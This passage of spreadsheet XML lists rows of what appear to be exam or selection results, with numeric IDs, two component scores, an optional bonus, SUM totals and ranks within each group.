      <c r="E519" s="8" t="n">
        <v>40.6</v>
      </c>
      <c r="F519" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G519" s="8"/>
      <c r="H519" s="8" t="n">
        <f aca="false">SUM(E519:G519)</f>
        <v>100.4</v>
      </c>
      <c r="I519" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="520" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A520" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B520" s="8" t="n">
        <v>1314011819</v>
      </c>
      <c r="C520" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D520" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E520" s="8" t="n">
        <v>46.8</v>
      </c>
      <c r="F520" s="8" t="n">
        <v>48.4</v>
      </c>
      <c r="G520" s="8"/>
      <c r="H520" s="8" t="n">
        <f aca="false">SUM(E520:G520)</f>
        <v>95.2</v>
      </c>
      <c r="I520" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="521" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A521" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B521" s="8" t="n">
        <v>1314011815</v>
      </c>
      <c r="C521" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D521" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E521" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F521" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G521" s="8"/>
      <c r="H521" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I521" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="522" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A522" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B522" s="8" t="n">
        <v>1314011830</v>
      </c>
      <c r="C522" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D522" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E522" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="F522" s="8" t="n">
        <v>70</v>
      </c>
      <c r="G522" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H522" s="8" t="n">
        <f aca="false">SUM(E522:G522)</f>
        <v>136.8</v>
      </c>
      <c r="I522" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="523" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A523" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B523" s="8" t="n">
        <v>1314011903</v>
      </c>
      <c r="C523" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D523" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E523" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F523" s="8" t="n">
        <v>71.6</v>
      </c>
      <c r="G523" s="8"/>
      <c r="H523" s="8" t="n">
        <f aca="false">SUM(E523:G523)</f>
        <v>132.4</v>
      </c>
      <c r="I523" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="524" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A524" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B524" s="8" t="n">
        <v>1314011909</v>
      </c>
      <c r="C524" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D524" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E524" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F524" s="8" t="n">
        <v>70.8</v>
      </c>
      <c r="G524" s="8"/>
      <c r="H524" s="8" t="n">
        <f aca="false">SUM(E524:G524)</f>
        <v>131.6</v>
      </c>
      <c r="I524" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="525" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A525" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B525" s="8" t="n">
        <v>1314011824</v>
      </c>
      <c r="C525" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D525" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E525" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="F525" s="8" t="n">
        <v>68.8</v>
      </c>
      <c r="G525" s="8"/>
      <c r="H525" s="8" t="n">
        <f aca="false">SUM(E525:G525)</f>
        <v>129</v>
      </c>
      <c r="I525" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="526" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A526" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B526" s="8" t="n">
        <v>1314011823</v>
      </c>
      <c r="C526" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D526" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E526" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="F526" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G526" s="8"/>
      <c r="H526" s="8" t="n">
        <f aca="false">SUM(E526:G526)</f>
        <v>127.8</v>
      </c>
      <c r="I526" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="527" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A527" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B527" s="8" t="n">
        <v>1314011822</v>
      </c>
      <c r="C527" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D527" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E527" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F527" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="G527" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H527" s="8" t="n">
        <f aca="false">SUM(E527:G527)</f>
        <v>127</v>
      </c>
      <c r="I527" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="528" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A528" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B528" s="8" t="n">
        <v>1314011905</v>
      </c>
      <c r="C528" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D528" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E528" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="F528" s="8" t="n">
        <v>76.2</v>
      </c>
      <c r="G528" s="8"/>
      <c r="H528" s="8" t="n">
        <f aca="false">SUM(E528:G528)</f>
        <v>126.8</v>
      </c>
      <c r="I528" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="529" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A529" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B529" s="8" t="n">
        <v>1314011827</v>
      </c>
      <c r="C529" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D529" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E529" s="8" t="n">
        <v>58.8</v>
      </c>
      <c r="F529" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="G529" s="8"/>
      <c r="H529" s="8" t="n">
        <f aca="false">SUM(E529:G529)</f>
        <v>125.2</v>
      </c>
      <c r="I529" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="530" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A530" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B530" s="8" t="n">
        <v>1314011901</v>
      </c>
      <c r="C530" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D530" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E530" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="F530" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G530" s="8"/>
      <c r="H530" s="8" t="n">
        <f aca="false">SUM(E530:G530)</f>
        <v>123.8</v>
      </c>
      <c r="I530" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="531" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A531" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B531" s="8" t="n">
        <v>1314011916</v>
      </c>
      <c r="C531" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D531" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E531" s="8" t="n">
        <v>56</v>
      </c>
      <c r="F531" s="8" t="n">
        <v>65.4</v>
      </c>
      <c r="G531" s="8"/>
      <c r="H531" s="8" t="n">
        <f aca="false">SUM(E531:G531)</f>
        <v>121.4</v>
      </c>
      <c r="I531" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="532" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A532" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B532" s="8" t="n">
        <v>1314011828</v>
      </c>
      <c r="C532" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D532" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E532" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="F532" s="8" t="n">
        <v>67.4</v>
      </c>
      <c r="G532" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H532" s="8" t="n">
        <f aca="false">SUM(E532:G532)</f>
        <v>121</v>
      </c>
      <c r="I532" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="533" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A533" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B533" s="8" t="n">
        <v>1314011914</v>
      </c>
      <c r="C533" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D533" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E533" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F533" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G533" s="8"/>
      <c r="H533" s="8" t="n">
        <f aca="false">SUM(E533:G533)</f>
        <v>120.6</v>
      </c>
      <c r="I533" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="534" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A534" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B534" s="8" t="n">
        <v>1314011826</v>
      </c>
      <c r="C534" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D534" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E534" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="F534" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G534" s="8"/>
      <c r="H534" s="8" t="n">
        <f aca="false">SUM(E534:G534)</f>
        <v>119</v>
      </c>
      <c r="I534" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="535" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A535" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B535" s="8" t="n">
        <v>1314011820</v>
      </c>
      <c r="C535" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D535" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E535" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F535" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G535" s="8"/>
      <c r="H535" s="8" t="n">
        <f aca="false">SUM(E535:G535)</f>
        <v>117.4</v>
      </c>
      <c r="I535" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="536" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A536" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B536" s="8" t="n">
        <v>1314011821</v>
      </c>
      <c r="C536" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D536" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E536" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="F536" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G536" s="8"/>
      <c r="H536" s="8" t="n">
        <f aca="false">SUM(E536:G536)</f>
        <v>116.6</v>
      </c>
      <c r="I536" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="537" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A537" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B537" s="8" t="n">
        <v>1314011908</v>
      </c>
      <c r="C537" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D537" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E537" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="F537" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="G537" s="8"/>
      <c r="H537" s="8" t="n">
        <f aca="false">SUM(E537:G537)</f>
        <v>116</v>
      </c>
      <c r="I537" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="538" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A538" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B538" s="8" t="n">
        <v>1314011915</v>
      </c>
      <c r="C538" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D538" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E538" s="8" t="n">
        <v>50.4</v>
      </c>
      <c r="F538" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G538" s="8"/>
      <c r="H538" s="8" t="n">
        <f aca="false">SUM(E538:G538)</f>
        <v>114</v>
      </c>
      <c r="I538" s="8" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="539" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A539" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B539" s="8" t="n">
        <v>1314011911</v>
      </c>
      <c r="C539" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D539" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E539" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="F539" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G539" s="8"/>
      <c r="H539" s="8" t="n">
        <f aca="false">SUM(E539:G539)</f>
        <v>113.8</v>
      </c>
      <c r="I539" s="8" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="540" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A540" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B540" s="8" t="n">
        <v>1314011902</v>
      </c>
      <c r="C540" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D540" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E540" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="F540" s="8" t="n">
        <v>63</v>
      </c>
      <c r="G540" s="8"/>
      <c r="H540" s="8" t="n">
        <f aca="false">SUM(E540:G540)</f>
        <v>111.8</v>
      </c>
      <c r="I540" s="8" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="541" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A541" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B541" s="8" t="n">
        <v>1314011825</v>
      </c>
      <c r="C541" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D541" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E541" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="F541" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G541" s="8"/>
      <c r="H541" s="8" t="n">
        <f aca="false">SUM(E541:G541)</f>
        <v>111.2</v>
      </c>
      <c r="I541" s="8" t="n">
        <v>20</v>
      </c>
    </row>
    <row r="542" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A542" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B542" s="8" t="n">
        <v>1314011904</v>
      </c>
      <c r="C542" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D542" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E542" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="F542" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="G542" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H542" s="8" t="n">
        <f aca="false">SUM(E542:G542)</f>
        <v>110.8</v>
      </c>
      <c r="I542" s="8" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="543" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A543" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B543" s="8" t="n">
        <v>1314011906</v>
      </c>
      <c r="C543" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D543" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E543" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F543" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G543" s="8"/>
      <c r="H543" s="8" t="n">
        <f aca="false">SUM(E543:G543)</f>
        <v>110.6</v>
      </c>
      <c r="I543" s="8" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="544" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A544" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B544" s="8" t="n">
        <v>1314011907</v>
      </c>
      <c r="C544" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D544" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E544" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F544" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="G544" s="8"/>
      <c r="H544" s="8" t="n">
        <f aca="false">SUM(E544:G544)</f>
        <v>110.6</v>
      </c>
      <c r="I544" s="8" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="545" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A545" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B545" s="8" t="n">
        <v>1314011910</v>
      </c>
      <c r="C545" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D545" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E545" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F545" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="G545" s="8"/>
      <c r="H545" s="8" t="n">
        <f aca="false">SUM(E545:G545)</f>
        <v>104.6</v>
      </c>
      <c r="I545" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="546" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A546" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B546" s="8" t="n">
        <v>1314011829</v>
      </c>
      <c r="C546" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D546" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E546" s="8" t="n">
        <v>47.4</v>
      </c>
      <c r="F546" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G546" s="8"/>
      <c r="H546" s="8" t="n">
        <f aca="false">SUM(E546:G546)</f>
        <v>102.8</v>
      </c>
      <c r="I546" s="8" t="n">
        <v>25</v>
      </c>
    </row>
    <row r="547" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A547" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B547" s="8" t="n">
        <v>1314011917</v>
      </c>
      <c r="C547" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D547" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E547" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F547" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G547" s="8"/>
      <c r="H547" s="8" t="n">
        <f aca="false">SUM(E547:G547)</f>
        <v>101.8</v>
      </c>
      <c r="I547" s="8" t="n">
        <v>26</v>
      </c>
    </row>
    <row r="548" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A548" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B548" s="8" t="n">
        <v>1314011913</v>
      </c>
      <c r="C548" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D548" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E548" s="8" t="n">
        <v>39.2</v>
      </c>
      <c r="F548" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="G548" s="8"/>
      <c r="H548" s="8" t="n">
        <f aca="false">SUM(E548:G548)</f>
        <v>89.8</v>
      </c>
      <c r="I548" s="8" t="n">
        <v>27</v>
      </c>
    </row>
    <row r="549" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A549" s="8" t="n">
        <v>4300089</v>
      </c>
      <c r="B549" s="8" t="n">
        <v>1314011912</v>
      </c>
      <c r="C549" s="8" t="s">
        <v>151</v>
      </c>
      <c r="D549" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E549" s="8" t="n">
        <v>30.6</v>
      </c>
      <c r="F549" s="8" t="n">
        <v>38.4</v>
      </c>
      <c r="G549" s="8"/>
      <c r="H549" s="8" t="n">
        <f aca="false">SUM(E549:G549)</f>
        <v>69</v>
      </c>
      <c r="I549" s="8" t="n">
        <v>28</v>
      </c>
    </row>
    <row r="550" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A550" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B550" s="8" t="n">
        <v>1314011922</v>
      </c>
      <c r="C550" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D550" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E550" s="8" t="n">
        <v>62</v>
      </c>
      <c r="F550" s="8" t="n">
        <v>67.8</v>
      </c>
      <c r="G550" s="8"/>
      <c r="H550" s="8" t="n">
        <f aca="false">SUM(E550:G550)</f>
        <v>129.8</v>
      </c>
      <c r="I550" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="551" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A551" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B551" s="8" t="n">
        <v>1314011924</v>
      </c>
      <c r="C551" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D551" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E551" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="F551" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="G551" s="8"/>
      <c r="H551" s="8" t="n">
        <f aca="false">SUM(E551:G551)</f>
        <v>119</v>
      </c>
      <c r="I551" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="552" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A552" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B552" s="8" t="n">
        <v>1314011923</v>
      </c>
      <c r="C552" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D552" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E552" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="F552" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="G552" s="8"/>
      <c r="H552" s="8" t="n">
        <f aca="false">SUM(E552:G552)</f>
        <v>118</v>
      </c>
      <c r="I552" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="553" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A553" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B553" s="8" t="n">
        <v>1314011921</v>
      </c>
      <c r="C553" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D553" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E553" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F553" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="G553" s="8"/>
      <c r="H553" s="8" t="n">
        <f aca="false">SUM(E553:G553)</f>
        <v>117.8</v>
      </c>
      <c r="I553" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="554" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A554" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B554" s="8" t="n">
        <v>1314011918</v>
      </c>
      <c r="C554" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D554" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E554" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="F554" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="G554" s="8"/>
      <c r="H554" s="8" t="n">
        <f aca="false">SUM(E554:G554)</f>
        <v>117.2</v>
      </c>
      <c r="I554" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="555" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A555" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B555" s="8" t="n">
        <v>1314011919</v>
      </c>
      <c r="C555" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D555" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E555" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F555" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G555" s="8"/>
      <c r="H555" s="8" t="n">
        <f aca="false">SUM(E555:G555)</f>
        <v>115.2</v>
      </c>
      <c r="I555" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="556" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A556" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B556" s="8" t="n">
        <v>1314011925</v>
      </c>
      <c r="C556" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D556" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E556" s="8" t="n">
        <v>48.4</v>
      </c>
      <c r="F556" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G556" s="8"/>
      <c r="H556" s="8" t="n">
        <f aca="false">SUM(E556:G556)</f>
        <v>107</v>
      </c>
      <c r="I556" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="557" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A557" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B557" s="8" t="n">
        <v>1314011920</v>
      </c>
      <c r="C557" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D557" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E557" s="8" t="n">
        <v>40.4</v>
      </c>
      <c r="F557" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="G557" s="8"/>
      <c r="H557" s="8" t="n">
        <f aca="false">SUM(E557:G557)</f>
        <v>97.6</v>
      </c>
      <c r="I557" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="558" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A558" s="8" t="n">
        <v>4300090</v>
      </c>
      <c r="B558" s="8" t="n">
        <v>1314011926</v>
      </c>
      <c r="C558" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D558" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E558" s="8" t="n">
        <v>46.6</v>
      </c>
      <c r="F558" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="G558" s="8"/>
      <c r="H558" s="8" t="n">
        <f aca="false">SUM(E558:G558)</f>
        <v>95.4</v>
      </c>
      <c r="I558" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="559" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A559" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B559" s="8" t="n">
        <v>1314011927</v>
      </c>
      <c r="C559" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D559" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E559" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F559" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G559" s="14"/>
      <c r="H559" s="8" t="n">
        <f aca="false">SUM(E559:G559)</f>
        <v>124.4</v>
      </c>
      <c r="I559" s="14" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="560" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A560" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B560" s="8" t="n">
        <v>1314012005</v>
      </c>
      <c r="C560" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D560" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E560" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F560" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G560" s="14"/>
      <c r="H560" s="8" t="n">
        <f aca="false">SUM(E560:G560)</f>
        <v>118.2</v>
      </c>
      <c r="I560" s="14" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="561" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A561" s="14" t="n">
        <v>4300091</v>
      </c>
      <c r="B561" s="8" t="n">
        <v>1314012003</v>
      </c>
      <c r="C561" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D561" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E561" s="8" t="n">
        <v>44.6</v>
      </c>
